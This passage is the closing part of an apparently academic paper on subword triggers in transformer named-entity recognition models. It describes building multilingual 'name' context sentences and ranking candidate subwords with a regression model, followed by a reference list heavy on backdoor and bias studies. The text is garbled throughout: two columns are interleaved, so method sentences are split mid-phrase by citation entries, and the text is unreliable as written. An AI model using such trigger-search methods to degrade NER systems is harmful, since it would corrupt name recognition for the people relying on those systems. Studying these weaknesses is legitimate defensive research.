Mitigating Unwanted Algorithmic Bias,” IBM Journal of Research and
Development. pp. 1-1. 10.1147/JRD.2019.2942287, 2019.
[4] L. Celis, A. Mehrotra, N. Vishnoi, “Fair Classification with Adversarial
Perturbations,” In Proceedings of the 35th International Conference on
Neural Information Processing Systems, 2021.
[5] S. Chu, D. Kim, B. Han, “Learning Debiased and Disentangled Rep-
resentations for Semantic Segmentation,” In Proceedings of the 35th
Intern. Conference on Neural Information Processing Systems, 2021.
Fig. 6. NER Performance with Regression Predicted Subwords [6] A. Conneau, K. Khandelwal, N. Goyal, V. Chaudhary, G. Wenzek, F.
Guzman, E. Grave, M. Ott, L. Zettlemoyer, V. Stoyanov, “Unsupervised
Cross-lingual Representation Learning at Scale,” Proceedings of the 58th
Through some trial and error, the approach that worked best Annual Meeting of the Association for Computational Linguistics, pages
8440-8451, 2020.
to add context to the subword embeddings (as described in the [7] J. Devlin, M. Chang, K. Lee, K. Toutanova, “BERT: Pre-training
literature review) was to create input sentences with multiple of Deep Bidirectional Transformers for Language Understanding,” In
versions of the word "name" as written in different languages. Proceedings of the 2019 Conference of the North American Chapter
of the Association for Computational Linguistics: Human Language
Each individual subword to be embedded was inserted in the Technologies, pages 4171-4186, 2019.
middle of the sentence. For example, a sentence similar to this [8] J. Dhamala, T. Sun, V. Kumar, S. Krishna, Y. Pruksachatkun, K. Chang,
one was used: sent = " míngchēng imya isim " + subword + " R. Gupta, “BOLD: Dataset and Metrics for Measuring Biases in Open-
Ended Language Generation,” FAccT ’21: Proceedings of the 2021 ACM
nimi nome nombre name aism ". Name variations with orig- Conference on Fairness, Accountability, and Transparency, pages 862-
inal foreign characters are also recommended. These context 872, 2021.
sentences with the inserted subword were then processed by [9] I. Garrido-Munoz, A. Montejo-Raez, F. Martinez-Santiago, L. Urena-
Lopez, “A Survey on Bias in Deep NLP,” MDPI Applied Sciences 11,
the Transformer. The Transformer produces embeddings for 3184, 2021.
each word/subword in the sentence but only the embedding [10] A. Ghaddar, P. Langlais, A. Rashid, M. HRezagholizadeh, “Context-
for the subword that will be concatenated is needed, so the aware Adversarial Training for Name Regularity Bias in Named Entity
Recognition,” Transactions of the Association for Computational Lin-
other ones are discarded. guistics, vol 9, pages 586–604, 2021.
After training with the 7000 samples set, the regression [11] S. Goldwasser, M. Kim, V. Vaikuntanathan, O. Zamir, “Plant-
model was applied to all the remaining subword candidates. ing Undetectable Backdoors in Machine Learning Models,” ArXiv,
abs/2204.06974, 2022.
The predicted scores were sorted and the subwords with top [12] A. Guan, B. Duong, “Neural Backdoors in NLP,”
performing scores were selected. http://web.stanford.edu, 2019.
[13] R. Hall, H. Gonen, R. Cotterell, S. Teufel, “ It’s all in the name: Miti- [33] D. Nozza, F. Bianchi, D. Hovy, “Pipelines for Social Bias Testing of
gating gender bias with name-based counterfactual data substitution,” In Large Language Models,” ACL 2022 Workshop BigScience, 2022.
Proceedings of the 2019 Conference on Empirical Methods in Natural [34] M. Peters, M. Neumann, M. Iyyer, M. Gardner, C. Clark, K. Lee,
Language Processing and the 9th International Joint Conference on L. Zettlemoyer, “Deep Contextualized Word Representations,” In Pro-
Natural Language Processing (EMNLP-IJCNLP), pages 5267–5275, ceedings of the 2018 Conference of the North American Chapter
2019. of the Association for Computational Linguistics: Human Language
[14] S. Hofstatter, A. Lipani, S. Althammer, M. Zlabinger, A. Hanbury, “Mit- Technologies, pages 2227–2237, New Orleans, Louisiana. Association
igating the Position Bias of Transformer Models in Passage Re-ranking,” for Computational Linguistics, 2018.
Advances in Information Retrieval - 43rd European Conference on IR [35] Y. Qian, U. Muaz, B. Zhang, J. Hyun, “Reducing gender bias in
Research, Springer, Lecture Notes in Computer Science, volume 12656, word-level language models with a gender-equalizing loss function,” In
pages 238–253, 2021. Proceedings of the 57th Annual Meeting of the Association for Com-
[15] Y. Hong, E. Yang, “Unbiased Classification through Bias-Contrastive putational Linguistics: Student Research Workshop, pages 223–228,
and Bias-Balanced Learning,” In Proceedings of the 35th International Florence, Italy, 2019.
Conference on Neural Information Processing Systems, 2021. [36] C. Rytting, D. Wingate, “Leveraging the Inductive Bias of Large
[16] Hugginface, “Retrived RoBERTa XLM for NER from,” 2022, Language Models for Abstract Textual Reasoning,” In Proceedings of
https://huggingface.co/Davlan/xlm-roberta-base-ner-hrl. the 35th International Conference on Neural Information Processing
[17] H. Kirk, Y. Jun, H. Iqbal, E. Benussi, F. Volpin, F. Dreyer, A. Shtedritski, Systems, 2021.
Y. Asano, “Bias Out-of-the-Box: An Empirical Analysis of Intersectional [37] R. Sennrich, B. Haddow, A. Birch, “Neural Machine Translation of Rare
Occupational Biases in Popular Generative Language Models,” In Pro- Words with Subword Units,” Proceedings of the 54th Annual Meeting of
ceedings of the 35th International Conference on Neural Information the Association for Computational Linguistics, Berlin, Germany, pages
Processing Systems, 2021. 1715–1725, 2016.
[18] L. Kucinski, T. Korbak, P. Kolodziej, P. Milos, “Catalytic Role of Noise [38] L. Shen, S. Ji, X. Zhang, J. Li, J. Chen, J. hi, C. Fang, J. Yin, T. Wang,
and Necessity of Inductive Biases In the Emergence of Compositional “Backdoor Pre-Trained Models Can Transfer to All,” Proceedings of
Communication,” In Proceedings of the 35th International Conference the 2021 ACM SIGSAC Conference on Computer and Communications
on Neural Information Processing Systems, 2021. Security, pages 3141-3158, 2021.
[19] T. Kudo, “Subword Regularization: Improving Neural Network Trans- [39] P. Soulos, S. Rao, C. Smith, E. Rosen, A. Celikyilmaz, T. McCoy,
lation Models with Multiple Subword Candidates,” Proceedings of the Y. Jiang, C. Haley, R. Fernandez, H. Palangi, J. Gao, P. Smolensky,
56th Annual Meeting of the Association for Computational Linguistics, “Structural Biases for Improving Transformers on Translation into
pages 66-75, 2018. Morphologically Rich Languages,” Proceedings of the 18th biennial
[20] T. Kudo, J. Richardson, “SentencePiece: A simple and language inde- Machine Translation Summit, 2021.
pendent subword tokenizer and detokenizer for Neural Text Processing,” [40] Y. Tan, L. Celis, “Assessing Social and Intersectional Biases in Contex-
Proceedings of the 2018 Conference on Empirical Methods in Natural tualized Word Representations,” In Proceedings of the 33rd International
Language Processing: System Demonstrations, 2018. Conference on Neural Information Processing Systems, 2019.
[21] W. Lajewska, A. Wr’oblewska, “Protagonists’ Tagger in Literary Do- [41] A. Ushio, J. Camacho-Collados, “T-NER: An all-around python library
main - New Datasets and a Method for Person Entity Linkage,” ArXiv, for transformer-based named entity recognition,” Proceedings of the 16th
abs/2110.01349, 2021. Conference of the European Chapter of the Association for Computa-
[22] B. Li, H. Peng, R. Sainju, J. Yang, L. Yang, Y. Liang, W. Jiang, B. tional Linguistics: System Demonstrations, pages 53-62, 2021.
Wang, H. Liu, C. Ding, “Detecting Gender Bias in Transformer-based [42] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. Gomez,
Models: A Case Study on BERT,” ArXiv, abs/2110.15733, 2021a. L. Kaiser, I. Polosukhin, “Attention is All You Need,” In Proceedings
[23] J. Li, S. Ji, T. Du, B. Li, T. Wang, “TextBugger: Generating Adver- of the 31st International Conference on Neural Information Processing
sarial Text Against Real-world Applications,” Network and Distributed Systems, pages 6000-6010, 2017.
Systems Security (NDSS) Symposium, San Diego, CA, USA, 2019. [43] J. Vig, S. Gehrmann, Y. Belinkov, S. Qian, D. Nevo, Y. Singer,
[24] S. Li, H. Liu, T. Dong, B. Zhao, B. Hao, M. Xue, H. Zhu, J. Lu, “Hidden S. Shieber, “Investigating Gender Bias in Language Models Using
Backdoors in Human-Centric Language Models,” Proceedings of the Causal Mediation Analysis,” In Proceedings of the 34th International
2021 ACM SIGSAC Conference on Computer and Communications Conference on Neural Information Processing Systems, 2020.
Security, 2021b. [44] P. Vyas, A. Kuznetsova, D. Williamson, “Optimally Encoding Inductive
[25] H. Lin, Y. Lu, J. Tang, X. Han, L. Sun, Z. Wei, N. Yuan, “A Rigorous Biases into the Transformer Improves End-to-End Speech Translation,”
Study on Named Entity Recognition: Can Fine-tuning Pretrained Model Proceedings of Interspeech, pages 2287-2291, 2021.
Lead to the Promised Land?,” Proceedings of the 2020 Conference on [45] E. Watkins, M. McKenna, J. Chen, “The Four-Fifths Rule is Not
Empirical Methods in Natural Language Processing (EMNLP), pages Disparate Impact: A Woeful Tale of Epistemic Trespassing in Algo-
7291-7300, 2020. rithmic Fairness,” Parity Technologies, Inc., Technical Report, ArXiv,
[26] Y. Liu, M. Ott, N. Goyal, J. Du, M. Joshi, D. Chen, O. Levy, M. Lewis, abs/2202.09519, 2022.
L. Zettlemoyer, V. Stoyanov, “RoBERTa: A Robustly Optimized BERT [46] S. Wang, W. Guo, H. Narasimhan, A. Cotter, M. Gupta, M. Jordan,
Pretraining Approach,” http://arxiv.org/abs/1907.11692 2019. “Robust optimization for fairness with noisy protected groups,” In
[27] Y. Liu, G. Shen, G. Tao, S. An, S. Ma, X. Zhang, “PICCOLO: Exposing Proceedings of the 34th International Conference on Neural Information
Complex Backdoors in NLP Transformer Models,” IEEE Symposium on Processing Systems, Article 436, 5190–5203, 2020.
Security and Privacy (SP), San Francisco, Ca., 2022. [47] Wikipedia-persons-name, https://www.npmjs.com/package/wikidata-
[28] N. Mehrabi, T. Gowda, F. Morstatter, N. Peng, A. Galstyan, “Man person-names, online, 2022.
is to Person as Woman is to Location: Measuring Gender Bias in [48] T. Yu, J. Wu, R. Zhang, H. Zhao, S. Li, “User-in-the-Loop Named Entity
Named Entity Recognition,” Proceedings of the 31st ACM Conference Recognition via Counterfactual Learning,” In Proceedings of the 35th
on Hypertext and Social Media, 2020. International Conference on Neural Information Processing Systems,
[29] W. Merrill, V. Ramanujan, Y. Goldberg, R. Schwartz, N. Smith, “Effects 2021.
of Parameter Norm Growth During Transformer Training: Inductive [49] X. Zeng, Y. Li, Y. Zhai, Y. Zhang, “Counterfactual Generator: A Weakly-
Bias from Gradient Descent,” Proceedings of the 2021 Conference on Supervised Method for Named Entity Recognition,” Proceedings of the
Empirical Methods in Natural Language Processing, pages 1766-1781, 2020 Conference on Empirical Methods in Natural Language Processing
2021. (EMNLP), pages 7270-7280, 2020.
[30] S. Mishra, S. He, L. Belli, “Assessing Demographic Bias in Named [50] W. Zhang, H. Lin, X. Han, L. Sun, “De-biasing Distantly Supervised
Entity Recognition,” ArXiv, abs/2008.03415, 2020. Named Entity Recognition via Causal Intervention,” Proceedings of the
[31] A. Nagaraj, M. Kejriwal, “Robust Quantification of Gender Disparity 59th Annual Meeting of the Association for Computational Linguistics
in Pre-Modern English Literature using Natural Language Processing,” and the 11th International Joint Conference on Natural Language
ArXiv, abs/2204.05872, 2022. Processing, pages 4803-4813, 2021.
[32] N. Nangia, C. Vania, R. Bhalerao, S. Bowman, “CrowS-Pairs: A [51] Saisiyat code, https://github.com/rcalix1/SaisiyatPreexistingBackdoors,
Challenge Dataset for Measuring Social Biases in Masked Language online, 2022.
Models, EMNLP, 2020.

You might also like